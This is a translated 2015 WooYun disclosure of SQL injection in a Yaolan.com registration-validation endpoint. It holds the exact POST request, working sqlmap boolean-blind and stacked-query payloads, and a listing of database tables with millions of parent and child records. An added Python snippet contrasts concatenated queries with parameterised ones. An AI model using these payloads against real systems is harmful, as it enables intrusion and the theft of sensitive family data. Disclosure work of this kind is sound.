
Vulnerability Summary

Defect ID: wooyun-2015-0118715

Title: SQL injection in a Yaolan.com endpoint (large amounts of mother-and-baby information exposed)

Affected vendor: 摇篮网 (Yaolan.com)

Author: 天地不仁 以万物为刍狗

Submitted: 2015-06-07 21:52

Fixed: 2015-07-23 17:22

Published: 2015-07-23 17:22

Vulnerability type: SQL injection

Severity: Low

Self-assessed rank: 1

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-06-07: Details sent to the vendor, awaiting vendor action
2015-06-08: Vendor confirmed the issue; details disclosed to the vendor only
2015-06-18: Details disclosed to core white hats and domain experts
2015-06-28: Details disclosed to regular white hats
2015-07-08: Details disclosed to trainee white hats
2015-07-23: Details disclosed to the public

Brief description:

【HD】 In the name of the team and for personal honour, building network security together
-------------------------------------------------
Can this make the front page?

Detailed description:

Below are the details of this test.
POST request:

POST /AjaxValidate.aspx HTTP/1.1
Host: user.yaolan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.yaolan.com/RegisterC.aspx?desc=&back_url=http%3a%2f%2fjifen.yaolan.com%2f&immediately=False
Content-Length: 21
Cookie: __yl__test__cookies=1433598576400; _yl_ct=1433598576401; _yl_fr=4; _yl_utmb=1433598446840; _yl_utma=1433598446837.1433598446840; _yl_ft=1433598446836; _yl_nvid=ab316044bfbd5f5e4994d115bc55d823; _yl_pageid=AFfq22,RJrqqu,A7RjMr; Hm_lvt_04a8007d069875ec6d7ac710d65c2b92=1433598448; Hm_lpvt_04a8007d069875ec6d7ac710d65c2b92=1433598577; login_bg_num=1; base_domain_c454868876824458837735f572c90c75=yaolan.com; stay_bg=1; ASP.NET_SessionId=hi5hacmbagucv2ysmqlpymjx; theme=c; __CT_Data=gpv=1&apv_4579_www03=1&cpv_4579_www03=1; WRUID=708976282.1226983508; WRIgnore=true; xnsetting_c454868876824458837735f572c90c75=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22shareAuth%22%3Anull%7D
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
type=1&name=wooyun999


The name parameter is not sanitized and is injectable; two databases are reachable (see the screenshot below and the proof section for the exact details).
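As an added illustration that is not part of the original report, the snippet below reconstructs why the boolean probe listed in the proof section gives a blind oracle against a lookup that concatenates the name value, and why binding the value as a parameter removes that oracle. SQLite is used as an in-memory stand-in for the MySQL backend; the table rows and both lookup functions are assumptions, not Yaolan's code.

```python
import sqlite3

# Constructed in-memory stand-in for the MySQL backend; only the table
# name LoginInfo comes from the report, the rows are invented.
def seed_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE LoginInfo (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO LoginInfo (name) VALUES (?)",
                     [("wooyun999",), ("alice",)])
    return conn

def name_exists_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    """Hypothetical reconstruction of the flawed pattern behind
    /AjaxValidate.aspx: the POST value is pasted into the SQL text, so a
    quote inside it closes the string literal and the rest becomes SQL."""
    sql = "SELECT COUNT(*) FROM LoginInfo WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone()[0] > 0

def name_exists_safe(conn: sqlite3.Connection, name: str) -> bool:
    """Hardened version: the value is bound as a parameter, so it is only
    ever compared as data and cannot change the query's structure."""
    sql = "SELECT COUNT(*) FROM LoginInfo WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone()[0] > 0

# The boolean probe sqlmap reported, plus its false twin: blind injection
# works by comparing the responses to a true and a false condition.
# (The stacked-query SLEEP probe is not modelled; sqlite3.execute refuses
# to run more than one statement.)
TRUE_PROBE = "wooyun999' AND 7721=7721 AND 'VdGz'='VdGz"
FALSE_PROBE = "wooyun999' AND 7721=7722 AND 'VdGz'='VdGz"

def acts_as_boolean_oracle(lookup, conn: sqlite3.Connection) -> bool:
    """True when the endpoint answers the two probes differently, which
    is exactly the signal blind injection needs and the fix removes."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)

if __name__ == "__main__":
    db = seed_db()
    print("concatenated SQL acts as oracle:",
          acts_as_boolean_oracle(name_exists_vulnerable, db))
    print("parameterised SQL acts as oracle:",
          acts_as_boolean_oracle(name_exists_safe, db))
```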

[Screenshot: 0.png]


I checked the data volume of both databases: information_schema is small, but user_yaolan_com is enormous.

[Screenshot: 2.png]


Database: user_yaolan_com
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LoginInfo | 6740391 |
| ChildInfo | 6740373 |
| UserBaseInfo | 6740285 |
| UserExtInfo | 6740162 |
| MarkInfo | 6739086 |
| iur_child_birth_based | 5483060 |
| UserInterestInfo | 1021602 |
| UserSource | 1006414 |
| ChildInterestInfo | 496016 |
| CoinInfo | 444240 |
| NoDefaultChildInfo | 258726 |
| UserSignature | 81646 |
| BoroughList | 2870 |
| word_filter_reg | 2809 |
| CityList | 341 |
| CountryList | 243 |
| UserVerifyDetail | 136 |
| UserInterestDetailList | 107 |
| UserGeekDetail | 48 |
| ChildInterestDetailList | 40 |
| UserInterestList | 40 |
| ProvinceList | 35 |
| ChildInterestList | 22 |
| TradeList | 17 |
| GradeList | 16 |
| ProfessionList | 12 |
| IncomeList | 8 |
| EducationList | 5 |
| GeekList | 4 |
| VerifyList | 1 |
+-------------------------+---------+


Contents of the ChildInfo table (shown only to prove the data volume; apologies)

[Screenshot: 3.png]


[Screenshot: 4.png]


I did not go any deeper into the other tables.

Proof of vulnerability:

POST parameter 'name' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 270 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=1&name=wooyun999' AND 7721=7721 AND 'VdGz'='VdGz
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: type=1&name=wooyun999';(SELECT * FROM (SELECT(SLEEP(5)))wPGn)#
---
[22:19:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
[22:19:20] [INFO] fetching database names
[22:19:20] [INFO] fetching number of databases
[22:19:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:19:20] [INFO] retrieved: 2
[22:19:21] [INFO] retrieved: information_schema
[22:19:54] [INFO] retrieved: use
[22:20:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
r_yaolan_com
available databases [2]:
[*] information_schema
[*] user_yaolan_com
[22:20:44] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\user.yaolan.com'
[*] shutting down at 22:20:44

Fix recommendation:

Be a conscientious vendor: with millions of records at stake, is there a gift?

Copyright notice: when reposting, please credit the source: 天地不仁 以万物为刍狗@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-06-08 17:20

Vendor reply:

Vulnerability confirmed, fix in progress. Thanks to the WooYun white hat for the heads-up.

Latest status:

None yet